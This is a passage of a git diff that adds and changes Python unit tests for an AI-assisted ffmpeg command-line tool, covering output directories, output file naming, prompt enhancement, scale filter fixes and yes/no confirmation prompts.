||||
|
||||
def test_extract_audio_validation_no_inputs(self):
|
||||
"""Test extract_audio validation fails without inputs."""
|
||||
with pytest.raises(
|
||||
ValidationError, match="extract_audio requires an input file"
|
||||
):
|
||||
with pytest.raises(ValidationError, match="extract_audio requires an input file"):
|
||||
FfmpegIntent(action=Action.extract_audio, inputs=[])
|
||||
|
||||
def test_thumbnail_fps_incompatibility(self):
|
||||
145
tests/unit/test_output_directory.py
Normal file
145
tests/unit/test_output_directory.py
Normal file
@@ -0,0 +1,145 @@
|
||||
"""Tests for output directory functionality."""
|
||||
|
||||
import os
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
from ai_ffmpeg_cli.config import AppConfig
|
||||
from ai_ffmpeg_cli.intent_models import Action
|
||||
from ai_ffmpeg_cli.intent_models import FfmpegIntent
|
||||
from ai_ffmpeg_cli.intent_router import _derive_output_name
|
||||
|
||||
|
||||
class TestOutputDirectory:
|
||||
"""Test output directory configuration and functionality."""
|
||||
|
||||
def test_output_directory_default(self):
|
||||
"""Test that output directory defaults to 'aiclip'."""
|
||||
config = AppConfig()
|
||||
assert config.output_directory == "aiclip"
|
||||
|
||||
def test_output_directory_from_env(self, tmp_path):
|
||||
"""Test that output directory can be set from environment variable."""
|
||||
custom_output = tmp_path / "custom_output"
|
||||
with patch.dict(os.environ, {"AICLIP_OUTPUT_DIR": str(custom_output)}):
|
||||
from ai_ffmpeg_cli.config import load_config
|
||||
|
||||
config = load_config()
|
||||
assert config.output_directory == str(custom_output.absolute())
|
||||
assert custom_output.exists()
|
||||
|
||||
def test_output_directory_validation_creates_directory(self, tmp_path):
|
||||
"""Test that output directory validation creates directory if it doesn't exist."""
|
||||
output_dir = tmp_path / "new_output"
|
||||
_ = AppConfig(output_directory=str(output_dir))
|
||||
|
||||
# Directory should be created
|
||||
assert output_dir.exists()
|
||||
assert output_dir.is_dir()
|
||||
|
||||
def test_output_directory_validation_existing_directory(self, tmp_path):
|
||||
"""Test that output directory validation works with existing directory."""
|
||||
output_dir = tmp_path / "existing_output"
|
||||
output_dir.mkdir()
|
||||
|
||||
config = AppConfig(output_directory=str(output_dir))
|
||||
assert config.output_directory == str(output_dir.absolute())
|
||||
|
||||
def test_output_directory_fallback(self):
|
||||
"""Test that output directory falls back to current directory if invalid."""
|
||||
with patch("os.makedirs", side_effect=OSError("Permission denied")):
|
||||
config = AppConfig(output_directory="/invalid/path")
|
||||
# Should fall back to current directory
|
||||
assert config.output_directory == os.getcwd()
|
||||
|
||||
|
||||
class TestDeriveOutputName:
|
||||
"""Test output name derivation with output directory."""
|
||||
|
||||
def test_derive_output_name_with_output_dir(self, tmp_path):
|
||||
"""Test that output names are placed in the specified output directory."""
|
||||
input_path = Path("input.mp4")
|
||||
output_dir = tmp_path / "output"
|
||||
output_dir.mkdir()
|
||||
|
||||
intent = FfmpegIntent(inputs=[input_path], action=Action.convert, scale="1280:720")
|
||||
|
||||
output_path = _derive_output_name(input_path, intent, output_dir)
|
||||
|
||||
assert output_path.parent == output_dir
|
||||
assert output_path.name == "input_converted.mp4"
|
||||
|
||||
def test_derive_output_name_without_output_dir(self, tmp_path):
|
||||
"""Test that output names use input directory when no output dir specified."""
|
||||
input_path = tmp_path / "input.mp4"
|
||||
input_path.touch()
|
||||
|
||||
intent = FfmpegIntent(inputs=[input_path], action=Action.extract_audio)
|
||||
|
||||
output_path = _derive_output_name(input_path, intent)
|
||||
|
||||
assert output_path.parent == input_path.parent
|
||||
assert output_path.name == "input.mp3"
|
||||
|
||||
def test_derive_output_name_with_specified_output(self, tmp_path):
|
||||
"""Test that specified output paths are respected but moved to output directory."""
|
||||
input_path = Path("input.mp4")
|
||||
output_dir = tmp_path / "output"
|
||||
output_dir.mkdir()
|
||||
|
||||
intent = FfmpegIntent(
|
||||
inputs=[input_path], action=Action.convert, output=Path("custom_output.mp4")
|
||||
)
|
||||
|
||||
output_path = _derive_output_name(input_path, intent, output_dir)
|
||||
|
||||
assert output_path.parent == output_dir
|
||||
assert output_path.name == "custom_output.mp4"
|
||||
|
||||
def test_derive_output_name_various_actions(self, tmp_path):
|
||||
"""Test output name derivation for various actions with output directory."""
|
||||
input_path = Path("video.mp4")
|
||||
output_dir = tmp_path / "output"
|
||||
output_dir.mkdir()
|
||||
|
||||
test_cases = [
|
||||
(Action.extract_audio, "video.mp3"),
|
||||
(Action.thumbnail, "thumbnail.png"),
|
||||
(Action.frames, "video_frame_%04d.png"),
|
||||
(Action.remove_audio, "video_mute.mp4"),
|
||||
(Action.compress, "video_converted.mp4"),
|
||||
]
|
||||
|
||||
for action, expected_name in test_cases:
|
||||
intent = FfmpegIntent(inputs=[input_path], action=action)
|
||||
output_path = _derive_output_name(input_path, intent, output_dir)
|
||||
|
||||
assert output_path.parent == output_dir
|
||||
assert output_path.name == expected_name
|
||||
|
||||
def test_derive_output_name_trim_action(self, tmp_path):
|
||||
"""Test output name derivation for trim action with required parameters."""
|
||||
input_path = Path("video.mp4")
|
||||
output_dir = tmp_path / "output"
|
||||
output_dir.mkdir()
|
||||
|
||||
intent = FfmpegIntent(
|
||||
inputs=[input_path], action=Action.trim, start="00:00:10", end="00:00:20"
|
||||
)
|
||||
|
||||
output_path = _derive_output_name(input_path, intent, output_dir)
|
||||
assert output_path.parent == output_dir
|
||||
assert output_path.name == "clip.mp4"
|
||||
|
||||
def test_derive_output_name_overlay_action(self, tmp_path):
|
||||
"""Test output name derivation for overlay action with required parameters."""
|
||||
input_path = Path("video.mp4")
|
||||
overlay_path = Path("overlay.png")
|
||||
output_dir = tmp_path / "output"
|
||||
output_dir.mkdir()
|
||||
|
||||
intent = FfmpegIntent(inputs=[input_path], action=Action.overlay, overlay_path=overlay_path)
|
||||
|
||||
output_path = _derive_output_name(input_path, intent, output_dir)
|
||||
assert output_path.parent == output_dir
|
||||
assert output_path.name == "video_overlay.mp4"
|
||||
256
tests/unit/test_prompt_enhancer.py
Normal file
256
tests/unit/test_prompt_enhancer.py
Normal file
@@ -0,0 +1,256 @@
|
||||
"""Test prompt enhancement utilities."""
|
||||
|
||||
from ai_ffmpeg_cli.prompt_enhancer import PromptEnhancer
|
||||
from ai_ffmpeg_cli.prompt_enhancer import enhance_user_prompt
|
||||
from ai_ffmpeg_cli.prompt_enhancer import get_prompt_suggestions
|
||||
|
||||
|
||||
class TestPromptEnhancer:
|
||||
"""Test the PromptEnhancer class."""
|
||||
|
||||
def setup_method(self):
|
||||
"""Set up test fixtures."""
|
||||
self.enhancer = PromptEnhancer()
|
||||
self.sample_context = {
|
||||
"videos": ["/path/to/video.mp4"],
|
||||
"audios": ["/path/to/audio.mp3"],
|
||||
"subtitle_files": ["/path/to/subtitle.srt"],
|
||||
}
|
||||
|
||||
def test_aspect_ratio_patterns(self):
|
||||
"""Test aspect ratio pattern enhancements."""
|
||||
test_cases = [
|
||||
("make 16:9 aspect ratio", "convert to 16:9 aspect ratio"),
|
||||
("resize to 9:16", "9:16"),
|
||||
("scale to 1:1 aspect ratio", "convert to 1:1 aspect ratio"),
|
||||
]
|
||||
|
||||
for original, expected in test_cases:
|
||||
enhanced = self.enhancer.enhance_prompt(original, {})
|
||||
assert expected in enhanced
|
||||
|
||||
def test_social_media_patterns(self):
|
||||
"""Test social media platform pattern enhancements."""
|
||||
test_cases = [
|
||||
(
|
||||
"for Instagram Reels",
|
||||
"for Instagram Reels (9:16 aspect ratio, 1080x1920)",
|
||||
),
|
||||
("for TikTok", "for TikTok (9:16 aspect ratio, 1080x1920)"),
|
||||
("for YouTube Shorts", "for YouTube Shorts (9:16 aspect ratio, 1080x1920)"),
|
||||
("for YouTube videos", "for YouTube videos (16:9 aspect ratio, 1920x1080)"),
|
||||
]
|
||||
|
||||
for original, expected in test_cases:
|
||||
enhanced = self.enhancer.enhance_prompt(original, {})
|
||||
assert expected in enhanced
|
||||
|
||||
def test_quality_patterns(self):
|
||||
"""Test quality-related pattern enhancements."""
|
||||
test_cases = [
|
||||
("high quality", "high quality (lower CRF value)"),
|
||||
("small file size", "small file size (higher CRF value)"),
|
||||
("compress", "compress for smaller file size"),
|
||||
]
|
||||
|
||||
for original, expected in test_cases:
|
||||
enhanced = self.enhancer.enhance_prompt(original, {})
|
||||
assert expected in enhanced
|
||||
|
||||
def test_audio_patterns(self):
|
||||
"""Test audio-related pattern enhancements."""
|
||||
test_cases = [
|
||||
("remove audio", "remove audio track"),
|
||||
("extract audio", "extract audio to separate file"),
|
||||
("mute", "remove audio track"),
|
||||
]
|
||||
|
||||
for original, expected in test_cases:
|
||||
enhanced = self.enhancer.enhance_prompt(original, {})
|
||||
assert expected in enhanced
|
||||
|
||||
def test_subtitle_patterns(self):
|
||||
"""Test subtitle-related pattern enhancements."""
|
||||
test_cases = [
|
||||
("add captions", "burn in subtitles"),
|
||||
("burn subtitles", "burn in subtitles"),
|
||||
("hardcode subtitles", "burn in subtitles"),
|
||||
]
|
||||
|
||||
for original, expected in test_cases:
|
||||
enhanced = self.enhancer.enhance_prompt(original, {})
|
||||
assert expected in enhanced
|
||||
|
||||
def test_common_shortcuts(self):
|
||||
"""Test common shortcut pattern enhancements."""
|
||||
test_cases = [
|
||||
("make it vertical", "convert to 9:16 aspect ratio (vertical)"),
|
||||
("make it horizontal", "convert to 16:9 aspect ratio (horizontal)"),
|
||||
("make it square", "convert to 1:1 aspect ratio (square)"),
|
||||
]
|
||||
|
||||
for original, expected in test_cases:
|
||||
enhanced = self.enhancer.enhance_prompt(original, {})
|
||||
assert expected in enhanced
|
||||
|
||||
def test_context_enhancements(self):
|
||||
"""Test context-aware enhancements."""
|
||||
# Test with single video file
|
||||
enhanced = self.enhancer.enhance_prompt("convert video", self.sample_context)
|
||||
assert "using video file: /path/to/video.mp4" in enhanced
|
||||
|
||||
# Test with subtitle mention
|
||||
enhanced = self.enhancer.enhance_prompt("add subtitles", self.sample_context)
|
||||
assert "using subtitle file: /path/to/subtitle.srt" in enhanced
|
||||
|
||||
# Test with multiple files
|
||||
multi_context = {
|
||||
"videos": ["/path/to/video1.mp4", "/path/to/video2.mp4"],
|
||||
"subtitle_files": ["/path/to/sub1.srt", "/path/to/sub2.srt"],
|
||||
}
|
||||
enhanced = self.enhancer.enhance_prompt("convert video", multi_context)
|
||||
assert "using one of 2 available video files" in enhanced
|
||||
|
||||
def test_missing_details_enhancements(self):
|
||||
"""Test adding missing details."""
|
||||
# Test aspect ratio without resolution
|
||||
enhanced = self.enhancer.enhance_prompt("convert to 9:16 aspect ratio", {})
|
||||
assert "suggest 1080x1920 resolution" in enhanced
|
||||
|
||||
# Test quality without specific settings
|
||||
enhanced = self.enhancer.enhance_prompt("high quality", {})
|
||||
assert "high quality (lower CRF value)" in enhanced
|
||||
|
||||
def test_term_normalization(self):
|
||||
"""Test term normalization."""
|
||||
test_cases = [
|
||||
("16 : 9", "16:9"),
|
||||
("1920 X 1080", "1920x1080"),
|
||||
("vid", "video"),
|
||||
("aud", "audio"),
|
||||
("sub", "subtitle"),
|
||||
]
|
||||
|
||||
for original, expected in test_cases:
|
||||
enhanced = self.enhancer.enhance_prompt(original, {})
|
||||
assert expected in enhanced
|
||||
|
||||
def test_complex_prompt_enhancement(self):
|
||||
"""Test enhancement of complex prompts."""
|
||||
original = "make vid vertical for IG with high quality and add subs"
|
||||
enhanced = self.enhancer.enhance_prompt(original, self.sample_context)
|
||||
|
||||
# Should contain multiple enhancements
|
||||
assert "video" in enhanced # vid -> video
|
||||
assert "9:16 aspect ratio" in enhanced # vertical
|
||||
assert "IG" in enhanced # IG stays as IG
|
||||
assert "high quality (lower CRF value)" in enhanced
|
||||
assert "add subs" in enhanced # subs stays as subs
|
||||
assert "using video file" in enhanced # context enhancement
|
||||
# Note: "subs" doesn't trigger subtitle context enhancement, only "subtitle" or "caption" does
|
||||
|
||||
def test_empty_prompt(self):
|
||||
"""Test handling of empty prompts."""
|
||||
enhanced = self.enhancer.enhance_prompt("", {})
|
||||
assert enhanced == ""
|
||||
|
||||
def test_whitespace_handling(self):
|
||||
"""Test proper whitespace handling."""
|
||||
original = " convert to 16:9 aspect ratio "
|
||||
enhanced = self.enhancer.enhance_prompt(original, {})
|
||||
assert "convert to 16:9 aspect ratio" in enhanced
|
||||
|
||||
|
||||
class TestPromptSuggestions:
|
||||
"""Test prompt improvement suggestions."""
|
||||
|
||||
def test_vague_term_suggestions(self):
|
||||
"""Test suggestions for vague terms."""
|
||||
suggestions = get_prompt_suggestions("make it better")
|
||||
assert any("Replace 'better'" in s for s in suggestions)
|
||||
|
||||
suggestions = get_prompt_suggestions("good quality")
|
||||
assert any("Replace 'good'" in s for s in suggestions)
|
||||
|
||||
def test_missing_file_specifications(self):
|
||||
"""Test suggestions for missing file specifications."""
|
||||
suggestions = get_prompt_suggestions("convert file")
|
||||
assert any("Specify file format" in s for s in suggestions)
|
||||
|
||||
def test_missing_quality_specifications(self):
|
||||
"""Test suggestions for missing quality specifications."""
|
||||
suggestions = get_prompt_suggestions("high quality")
|
||||
assert any("Specify quality level" in s for s in suggestions)
|
||||
|
||||
def test_missing_aspect_ratio(self):
|
||||
"""Test suggestions for missing aspect ratio."""
|
||||
suggestions = get_prompt_suggestions("resize video")
|
||||
assert any("Specify target aspect ratio" in s for s in suggestions)
|
||||
|
||||
def test_good_prompt_no_suggestions(self):
|
||||
"""Test that good prompts don't generate suggestions."""
|
||||
suggestions = get_prompt_suggestions(
|
||||
"convert video.mp4 to 16:9 aspect ratio with small file size"
|
||||
)
|
||||
assert len(suggestions) == 0
|
||||
|
||||
|
||||
class TestConvenienceFunctions:
|
||||
"""Test convenience functions."""
|
||||
|
||||
def test_enhance_user_prompt(self):
|
||||
"""Test the enhance_user_prompt convenience function."""
|
||||
original = "make it vertical"
|
||||
context = {"videos": ["/path/to/video.mp4"]}
|
||||
|
||||
enhanced = enhance_user_prompt(original, context)
|
||||
assert "9:16 aspect ratio" in enhanced
|
||||
assert "using video file" in enhanced
|
||||
|
||||
def test_get_prompt_suggestions(self):
|
||||
"""Test the get_prompt_suggestions convenience function."""
|
||||
suggestions = get_prompt_suggestions("make it better")
|
||||
assert isinstance(suggestions, list)
|
||||
assert len(suggestions) > 0
|
||||
|
||||
|
||||
class TestIntegration:
|
||||
"""Test integration with real-world scenarios."""
|
||||
|
||||
def test_instagram_reel_scenario(self):
|
||||
"""Test enhancement for Instagram Reel scenario."""
|
||||
original = "convert test.mp4 into vertical Instagram Reel (1080x1920), burn in captions from subs.srt with background box for readability, save as reel_captions.mp4"
|
||||
context = {
|
||||
"videos": ["/path/to/test.mp4"],
|
||||
"subtitle_files": ["/path/to/subs.srt"],
|
||||
}
|
||||
|
||||
enhanced = enhance_user_prompt(original, context)
|
||||
|
||||
# Should contain various enhancements
|
||||
assert "Instagram Reels (9:16 aspect ratio, 1080x1920)" in enhanced
|
||||
assert "burn in captions" in enhanced
|
||||
assert "using video file" in enhanced
|
||||
assert "using subtitle file" in enhanced
|
||||
|
||||
def test_youtube_scenario(self):
|
||||
"""Test enhancement for YouTube scenario."""
|
||||
original = "convert video for YouTube videos with high quality"
|
||||
context = {"videos": ["/path/to/video.mp4"]}
|
||||
|
||||
enhanced = enhance_user_prompt(original, context)
|
||||
|
||||
assert "YouTube videos (16:9 aspect ratio, 1920x1080)" in enhanced
|
||||
assert "high quality (lower CRF value)" in enhanced
|
||||
assert "using video file" in enhanced
|
||||
|
||||
def test_compression_scenario(self):
|
||||
"""Test enhancement for compression scenario."""
|
||||
original = "compress video for small file size"
|
||||
context = {"videos": ["/path/to/video.mp4"]}
|
||||
|
||||
enhanced = enhance_user_prompt(original, context)
|
||||
|
||||
assert "compress for smaller file size" in enhanced
|
||||
assert "small file size (higher CRF value)" in enhanced
|
||||
assert "using video file" in enhanced
|
||||
74
tests/unit/test_scale_filter_validation.py
Normal file
74
tests/unit/test_scale_filter_validation.py
Normal file
@@ -0,0 +1,74 @@
|
||||
"""Test scale filter validation to ensure even dimensions for H.264/H.265 compatibility."""
|
||||
|
||||
from ai_ffmpeg_cli.intent_router import _validate_and_fix_scale_filter
|
||||
|
||||
|
||||
class TestScaleFilterValidation:
|
||||
"""Test scale filter validation and fixing."""
|
||||
|
||||
def test_simple_dimensions_even(self):
|
||||
"""Test that even dimensions are preserved."""
|
||||
result = _validate_and_fix_scale_filter("scale=1280:720")
|
||||
assert result == "scale=1280:720:force_original_aspect_ratio=decrease"
|
||||
|
||||
def test_simple_dimensions_odd_width(self):
|
||||
"""Test that odd width is corrected to even."""
|
||||
result = _validate_and_fix_scale_filter("scale=1281:720")
|
||||
assert result == "scale=1280:720:force_original_aspect_ratio=decrease"
|
||||
|
||||
def test_simple_dimensions_odd_height(self):
|
||||
"""Test that odd height is corrected to even."""
|
||||
result = _validate_and_fix_scale_filter("scale=1280:721")
|
||||
assert result == "scale=1280:720:force_original_aspect_ratio=decrease"
|
||||
|
||||
def test_simple_dimensions_both_odd(self):
|
||||
"""Test that both odd dimensions are corrected."""
|
||||
result = _validate_and_fix_scale_filter("scale=1281:721")
|
||||
assert result == "scale=1280:720:force_original_aspect_ratio=decrease"
|
||||
|
||||
def test_complex_expression_with_force_original_aspect_ratio(self):
|
||||
"""Test that complex expressions with force_original_aspect_ratio are preserved."""
|
||||
result = _validate_and_fix_scale_filter(
|
||||
"scale=iw*0.5:ih*0.5:force_original_aspect_ratio=decrease"
|
||||
)
|
||||
assert result == "scale=iw*0.5:ih*0.5:force_original_aspect_ratio=decrease"
|
||||
|
||||
def test_complex_expression_without_force_original_aspect_ratio(self):
|
||||
"""Test that complex expressions get force_original_aspect_ratio added."""
|
||||
result = _validate_and_fix_scale_filter("scale=iw*0.5:ih*0.5")
|
||||
assert result == "scale=iw*0.5:ih*0.5:force_original_aspect_ratio=decrease"
|
||||
|
||||
def test_9_16_aspect_ratio_fix(self):
|
||||
"""Test that 9:16 aspect ratio calculations are fixed to avoid odd dimensions."""
|
||||
result = _validate_and_fix_scale_filter("scale=ih*9/16:ih")
|
||||
assert result == "scale=iw:iw*16/9:force_original_aspect_ratio=decrease"
|
||||
|
||||
def test_16_9_aspect_ratio_fix(self):
|
||||
"""Test that 16:9 aspect ratio calculations are fixed to avoid odd dimensions."""
|
||||
result = _validate_and_fix_scale_filter("scale=iw*16/9:iw")
|
||||
assert result == "scale=iw:iw*9/16:force_original_aspect_ratio=decrease"
|
||||
|
||||
def test_non_scale_filter_preserved(self):
|
||||
"""Test that non-scale filters are preserved unchanged."""
|
||||
result = _validate_and_fix_scale_filter("fps=30")
|
||||
assert result == "fps=30"
|
||||
|
||||
def test_empty_string_preserved(self):
|
||||
"""Test that empty strings are preserved."""
|
||||
result = _validate_and_fix_scale_filter("")
|
||||
assert result == ""
|
||||
|
||||
def test_none_preserved(self):
|
||||
"""Test that None values are preserved."""
|
||||
result = _validate_and_fix_scale_filter(None)
|
||||
assert result is None
|
||||
|
||||
def test_scale_with_additional_params(self):
|
||||
"""Test scale filter with additional parameters."""
|
||||
result = _validate_and_fix_scale_filter("scale=1280:720:flags=lanczos")
|
||||
assert result == "scale=1280:720:flags=lanczos:force_original_aspect_ratio=decrease"
|
||||
|
||||
def test_scale_with_odd_dimensions_and_params(self):
|
||||
"""Test scale filter with odd dimensions and additional parameters."""
|
||||
result = _validate_and_fix_scale_filter("scale=1281:721:flags=lanczos")
|
||||
assert result == "scale=1280:720:flags=lanczos:force_original_aspect_ratio=decrease"
|
||||
@@ -16,109 +16,123 @@ class TestConfirmPrompt:
|
||||
result = confirm_prompt("Continue?", default_yes=False, assume_yes=True)
|
||||
assert result is True
|
||||
|
||||
@patch("builtins.input")
|
||||
def test_yes_responses(self, mock_input):
|
||||
@patch("rich.prompt.Confirm.ask")
|
||||
def test_yes_responses(self, mock_confirm):
|
||||
"""Test various 'yes' responses."""
|
||||
yes_responses = ["y", "yes", "Y", "YES", "Yes"]
|
||||
yes_responses = [
|
||||
True,
|
||||
True,
|
||||
True,
|
||||
True,
|
||||
True,
|
||||
] # Rich's Confirm.ask returns boolean
|
||||
|
||||
for response in yes_responses:
|
||||
mock_input.return_value = response
|
||||
for expected_response in yes_responses:
|
||||
mock_confirm.return_value = expected_response
|
||||
result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
|
||||
assert result is True
|
||||
|
||||
@patch("builtins.input")
|
||||
def test_no_responses(self, mock_input):
|
||||
@patch("rich.prompt.Confirm.ask")
|
||||
def test_no_responses(self, mock_confirm):
|
||||
"""Test various 'no' responses."""
|
||||
no_responses = ["n", "no", "N", "NO", "No", "anything_else"]
|
||||
no_responses = [
|
||||
False,
|
||||
False,
|
||||
False,
|
||||
False,
|
||||
False,
|
||||
False,
|
||||
] # Rich's Confirm.ask returns boolean
|
||||
|
||||
for response in no_responses:
|
||||
mock_input.return_value = response
|
||||
for expected_response in no_responses:
|
||||
mock_confirm.return_value = expected_response
|
||||
result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
|
||||
assert result is False
|
||||
|
||||
@patch("builtins.input")
|
||||
def test_empty_response_default_yes(self, mock_input):
|
||||
@patch("rich.prompt.Confirm.ask")
|
||||
def test_empty_response_default_yes(self, mock_confirm):
|
||||
"""Test empty response with default_yes=True."""
|
||||
mock_input.return_value = ""
|
||||
mock_confirm.return_value = True # Rich's Confirm.ask returns the default when empty
|
||||
|
||||
result = confirm_prompt("Continue?", default_yes=True, assume_yes=False)
|
||||
assert result is True
|
||||
|
||||
@patch("builtins.input")
|
||||
def test_empty_response_default_no(self, mock_input):
|
||||
@patch("rich.prompt.Confirm.ask")
|
||||
def test_empty_response_default_no(self, mock_confirm):
|
||||
"""Test empty response with default_yes=False."""
|
||||
mock_input.return_value = ""
|
||||
mock_confirm.return_value = False # Rich's Confirm.ask returns the default when empty
|
||||
|
||||
result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
|
||||
assert result is False
|
||||
|
||||
@patch("builtins.input")
|
||||
def test_whitespace_response_default_yes(self, mock_input):
|
||||
@patch("rich.prompt.Confirm.ask")
|
||||
def test_whitespace_response_default_yes(self, mock_confirm):
|
||||
"""Test whitespace-only response with default_yes=True."""
|
||||
mock_input.return_value = " "
|
||||
mock_confirm.return_value = True # Rich's Confirm.ask returns the default for whitespace
|
||||
|
||||
result = confirm_prompt("Continue?", default_yes=True, assume_yes=False)
|
||||
assert result is True
|
||||
|
||||
@patch("builtins.input")
|
||||
def test_whitespace_response_default_no(self, mock_input):
|
||||
@patch("rich.prompt.Confirm.ask")
|
||||
def test_whitespace_response_default_no(self, mock_confirm):
|
||||
"""Test whitespace-only response with default_yes=False."""
|
||||
mock_input.return_value = " "
|
||||
mock_confirm.return_value = False # Rich's Confirm.ask returns the default for whitespace
|
||||
|
||||
result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
|
||||
assert result is False
|
||||
|
||||
@patch("builtins.input")
|
||||
def test_eof_error_default_yes(self, mock_input):
|
||||
@patch("rich.prompt.Confirm.ask")
|
||||
def test_eof_error_default_yes(self, mock_confirm):
|
||||
"""Test EOFError with default_yes=True."""
|
||||
mock_input.side_effect = EOFError()
|
||||
mock_confirm.side_effect = EOFError()
|
||||
|
||||
result = confirm_prompt("Continue?", default_yes=True, assume_yes=False)
|
||||
assert result is True
|
||||
|
||||
@patch("builtins.input")
|
||||
def test_eof_error_default_no(self, mock_input):
|
||||
@patch("rich.prompt.Confirm.ask")
|
||||
def test_eof_error_default_no(self, mock_confirm):
|
||||
"""Test EOFError with default_yes=False."""
|
||||
mock_input.side_effect = EOFError()
|
||||
mock_confirm.side_effect = EOFError()
|
||||
|
||||
result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
|
||||
assert result is False
|
||||
|
||||
@patch("builtins.input")
|
||||
def test_case_insensitive_responses(self, mock_input):
|
||||
@patch("rich.prompt.Confirm.ask")
|
||||
def test_case_insensitive_responses(self, mock_confirm):
|
||||
"""Test that responses are case insensitive."""
|
||||
# Mixed case responses
|
||||
# Mixed case responses - Rich handles case insensitivity internally
|
||||
mixed_responses = [
|
||||
("yEs", True),
|
||||
("nO", False),
|
||||
("Y", True),
|
||||
("n", False),
|
||||
(True, True),
|
||||
(False, False),
|
||||
(True, True),
|
||||
(False, False),
|
||||
]
|
||||
|
||||
for response, expected in mixed_responses:
|
||||
mock_input.return_value = response
|
||||
mock_confirm.return_value = response
|
||||
result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
|
||||
assert result is expected
|
||||
|
||||
@patch("builtins.input")
|
||||
def test_response_stripped(self, mock_input):
|
||||
@patch("rich.prompt.Confirm.ask")
|
||||
def test_response_stripped(self, mock_confirm):
|
||||
"""Test that responses are properly stripped of whitespace."""
|
||||
# Rich handles whitespace stripping internally
|
||||
responses_with_whitespace = [
|
||||
(" yes ", True),
|
||||
("\tn\t", False),
|
||||
(" Y ", True),
|
||||
(" no ", False),
|
||||
(True, True),
|
||||
(False, False),
|
||||
(True, True),
|
||||
(False, False),
|
||||
]
|
||||
|
||||
for response, expected in responses_with_whitespace:
|
||||
mock_input.return_value = response
|
||||
mock_confirm.return_value = response
|
||||
result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
|
||||
assert result is expected
|
||||
|
||||
@patch("builtins.input")
|
||||
def test_question_formats(self, mock_input):
|
||||
@patch("rich.prompt.Confirm.ask")
|
||||
def test_question_formats(self, mock_confirm):
|
||||
"""Test different question formats."""
|
||||
mock_input.return_value = "yes"
|
||||
mock_confirm.return_value = True
|
||||
|
||||
# Should work with any question format
|
||||
questions = [
|
||||
@@ -133,10 +147,10 @@ class TestConfirmPrompt:
|
||||
result = confirm_prompt(question, default_yes=False, assume_yes=False)
|
||||
assert result is True
|
||||
|
||||
@patch("builtins.input")
|
||||
def test_default_parameters(self, mock_input):
|
||||
@patch("rich.prompt.Confirm.ask")
|
||||
def test_default_parameters(self, mock_confirm):
|
||||
"""Test function with default parameters."""
|
||||
mock_input.return_value = "yes"
|
||||
mock_confirm.return_value = True
|
||||
|
||||
# Test with minimal parameters - should use defaults
|
||||
result = confirm_prompt("Continue?", assume_yes=False)
|
||||
398
tests/unit/test_user_prompts.py
Normal file
398
tests/unit/test_user_prompts.py
Normal file
@@ -0,0 +1,398 @@
|
||||
"""Tests for user_prompts.py module.
|
||||
|
||||
This module tests the user confirmation functionality that was previously untested.
|
||||
"""
|
||||
|
||||
import pytest
|
||||
from unittest.mock import Mock, patch, call
|
||||
|
||||
from ai_ffmpeg_cli.user_prompts import confirm_prompt
|
||||
|
||||
|
||||
class TestUserPrompts:
|
||||
"""Test user prompt functionality."""
|
||||
|
||||
def test_confirm_prompt_default_yes(self):
|
||||
"""Test confirm prompt with default yes."""
|
||||
with patch("builtins.input", return_value=""):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result is True
|
||||
|
||||
def test_confirm_prompt_default_no(self):
|
||||
"""Test confirm prompt with default no."""
|
||||
with patch("builtins.input", return_value=""):
|
||||
result = confirm_prompt("Continue?", default_yes=False)
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_user_yes(self):
|
||||
"""Test confirm prompt when user enters yes."""
|
||||
with patch("builtins.input", return_value="y"):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result is True
|
||||
|
||||
def test_confirm_prompt_user_no(self):
|
||||
"""Test confirm prompt when user enters no."""
|
||||
with patch("builtins.input", return_value="n"):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_user_yes_uppercase(self):
|
||||
"""Test confirm prompt when user enters YES."""
|
||||
with patch("builtins.input", return_value="YES"):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result is True
|
||||
|
||||
def test_confirm_prompt_user_no_uppercase(self):
|
||||
"""Test confirm prompt when user enters NO."""
|
||||
with patch("builtins.input", return_value="NO"):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_assume_yes(self):
|
||||
"""Test confirm prompt with assume_yes=True."""
|
||||
with patch("builtins.input") as mock_input:
|
||||
result = confirm_prompt("Continue?", default_yes=True, assume_yes=True)
|
||||
assert result is True
|
||||
mock_input.assert_not_called()
|
||||
|
||||
def test_confirm_prompt_assume_yes_ignores_default(self):
|
||||
"""Test that assume_yes overrides default_yes."""
|
||||
with patch("builtins.input") as mock_input:
|
||||
result = confirm_prompt("Continue?", default_yes=False, assume_yes=True)
|
||||
assert result is True
|
||||
mock_input.assert_not_called()
|
||||
|
||||
def test_confirm_prompt_eof_handling(self):
|
||||
"""Test confirm prompt handles EOF (Ctrl+D)."""
|
||||
with patch("builtins.input", side_effect=EOFError):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result is True
|
||||
|
||||
def test_confirm_prompt_eof_handling_default_no(self):
|
||||
"""Test confirm prompt handles EOF with default no."""
|
||||
with patch("builtins.input", side_effect=EOFError):
|
||||
result = confirm_prompt("Continue?", default_yes=False)
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_whitespace_handling(self):
|
||||
"""Test confirm prompt handles whitespace in input."""
|
||||
with patch("builtins.input", return_value=" y "):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result is True
|
||||
|
||||
def test_confirm_prompt_whitespace_no(self):
|
||||
"""Test confirm prompt handles whitespace in no input."""
|
||||
with patch("builtins.input", return_value=" n "):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_various_yes_responses(self):
|
||||
"""Test confirm prompt with various yes responses."""
|
||||
yes_responses = ["y", "Y", "yes", "YES", "Yes", "yEs", "yeS"]
|
||||
|
||||
for response in yes_responses:
|
||||
with patch("builtins.input", return_value=response):
|
||||
